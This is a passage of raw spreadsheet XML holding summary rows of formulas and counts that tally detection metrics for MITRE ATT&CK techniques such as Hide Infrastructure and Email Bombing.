      </c>
      <c r="AT76" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>5</v>
      </c>
      <c r="AX76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY76" s="322" t="str">
        <f t="shared" si="22"/>
        <v>2 (5)</v>
      </c>
      <c r="AZ76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA76" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>2</v>
      </c>
      <c r="BC76" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>10</v>
      </c>
      <c r="BD76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>7</v>
      </c>
      <c r="BE76" s="4" t="str">
        <f t="shared" si="23"/>
        <v>7 (10)</v>
      </c>
      <c r="BF76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>7</v>
      </c>
      <c r="BG76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI76" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>5</v>
      </c>
      <c r="BJ76" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>4</v>
      </c>
      <c r="BK76" s="322" t="str">
        <f t="shared" si="24"/>
        <v>4 (5)</v>
      </c>
      <c r="BL76" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4</v>
      </c>
      <c r="BO76" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>96</v>
      </c>
      <c r="BP76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>89</v>
      </c>
      <c r="BQ76" s="4" t="str">
        <f t="shared" si="25"/>
        <v>89 (96)</v>
      </c>
      <c r="BR76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>11</v>
      </c>
      <c r="BT76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>87</v>
      </c>
      <c r="BV76" s="292">
        <v>3</v>
      </c>
      <c r="BW76" s="322">
        <v>3</v>
      </c>
      <c r="BX76" s="4" t="str">
        <f t="shared" si="26"/>
        <v>3 (3)</v>
      </c>
      <c r="BY76" s="12">
        <v>1</v>
      </c>
      <c r="BZ76" s="13">
        <v>1</v>
      </c>
      <c r="CA76" s="394">
        <v>3</v>
      </c>
      <c r="CB76" s="288">
        <v>6</v>
      </c>
      <c r="CC76" s="4">
        <v>6</v>
      </c>
      <c r="CD76" s="4" t="str">
        <f t="shared" si="27"/>
        <v>6 (6)</v>
      </c>
      <c r="CE76" s="4">
        <v>1</v>
      </c>
      <c r="CF76" s="4">
        <v>1</v>
      </c>
      <c r="CG76" s="13">
        <v>1</v>
      </c>
      <c r="CH76" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="77" spans="1:98" ht="15" customHeight="1">
      <c r="A77" s="4">
        <f t="shared" si="28"/>
        <v>75</v>
      </c>
      <c r="B77" s="4" t="str">
        <f>IFERROR(VLOOKUP(A77,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1665</v>
      </c>
      <c r="C77" s="4" t="str">
        <f>IFERROR(VLOOKUP(B77,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hide Infrastructure</v>
      </c>
      <c r="D77" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B77)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F77" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (12)</v>
      </c>
      <c r="G77" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>18</v>
      </c>
      <c r="H77" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>4</v>
      </c>
      <c r="I77" s="322" t="str">
        <f t="shared" si="15"/>
        <v>4 (18)</v>
      </c>
      <c r="J77" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>4</v>
      </c>
      <c r="M77" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N77" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O77" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P77" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S77" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>18</v>
      </c>
      <c r="T77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>4</v>
      </c>
      <c r="U77" s="4" t="str">
        <f t="shared" si="17"/>
        <v>4 (18)</v>
      </c>
      <c r="V77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>4</v>
      </c>
      <c r="Y77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>286</v>
      </c>
      <c r="Z77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA77" s="322" t="str">
        <f t="shared" si="18"/>
        <v>11 (286)</v>
      </c>
      <c r="AB77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC77" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>9</v>
      </c>
      <c r="AE77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>6</v>
      </c>
      <c r="AF77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>6</v>
      </c>
      <c r="AG77" s="322" t="str">
        <f t="shared" si="19"/>
        <v>6 (6)</v>
      </c>
      <c r="AH77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI77" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>292</v>
      </c>
      <c r="AL77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>17</v>
      </c>
      <c r="AM77" s="322" t="str">
        <f t="shared" si="20"/>
        <v>17 (292)</v>
      </c>
      <c r="AN77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO77" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>10</v>
      </c>
      <c r="AQ77" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR77" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS77" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT77" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>4</v>
      </c>
      <c r="AX77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY77" s="322" t="str">
        <f t="shared" si="22"/>
        <v>1 (4)</v>
      </c>
      <c r="AZ77" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA77" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC77" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>22</v>
      </c>
      <c r="BD77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>5</v>
      </c>
      <c r="BE77" s="4" t="str">
        <f t="shared" si="23"/>
        <v>5 (22)</v>
      </c>
      <c r="BF77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI77" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>9</v>
      </c>
      <c r="BJ77" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>5</v>
      </c>
      <c r="BK77" s="322" t="str">
        <f t="shared" si="24"/>
        <v>5 (9)</v>
      </c>
      <c r="BL77" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4</v>
      </c>
      <c r="BO77" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>22</v>
      </c>
      <c r="BP77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>18</v>
      </c>
      <c r="BQ77" s="4" t="str">
        <f t="shared" si="25"/>
        <v>18 (22)</v>
      </c>
      <c r="BR77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT77" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU77" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV77" s="292">
        <v>18</v>
      </c>
      <c r="BW77" s="322">
        <v>9</v>
      </c>
      <c r="BX77" s="4" t="str">
        <f t="shared" si="26"/>
        <v>9 (18)</v>
      </c>
      <c r="BY77" s="12">
        <v>3</v>
      </c>
      <c r="BZ77" s="13">
        <v>1</v>
      </c>
      <c r="CA77" s="394">
        <v>6</v>
      </c>
      <c r="CB77" s="288">
        <v>36</v>
      </c>
      <c r="CC77" s="4">
        <v>15</v>
      </c>
      <c r="CD77" s="4" t="str">
        <f t="shared" si="27"/>
        <v>15 (36)</v>
      </c>
      <c r="CE77" s="4">
        <v>3</v>
      </c>
      <c r="CF77" s="4">
        <v>1</v>
      </c>
      <c r="CG77" s="13">
        <v>1</v>
      </c>
      <c r="CH77" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="78" spans="1:98" ht="15" customHeight="1">
      <c r="A78" s="4">
        <f t="shared" si="28"/>
        <v>76</v>
      </c>
      <c r="B78" s="4" t="str">
        <f>IFERROR(VLOOKUP(A78,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1667</v>
      </c>
      <c r="C78" s="493" t="str">
        <f>IFERROR(VLOOKUP(B78,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Bombing</v>
      </c>
      <c r="D78" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B78)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>100</v>
      </c>
      <c r="F78" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (100)</v>
      </c>
      <c r="G78" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H78" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I78" s="322" t="str">
        <f t="shared" si="15"/>
        <v>2 (2)</v>
      </c>
      <c r="J78" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M78" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N78" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O78" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P78" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S78" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>2</v>
      </c>
      <c r="U78" s="4" t="str">
        <f t="shared" si="17"/>
        <v>2 (2)</v>
      </c>
      <c r="V78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>2</v>
      </c>
      <c r="Z78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA78" s="322" t="str">
        <f t="shared" si="18"/>
        <v>2 (2)</v>
      </c>
      <c r="AB78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC78" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG78" s="322" t="str">
        <f t="shared" si="19"/>
        <v>2 (4)</v>
      </c>
      <c r="AH78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI78" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>6</v>
      </c>
      <c r="AL78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>4</v>
      </c>
      <c r="AM78" s="322" t="str">
        <f t="shared" si="20"/>
        <v>4 (6)</v>
      </c>
      <c r="AN78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>3</v>
      </c>
      <c r="AO78" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP78" s="394">
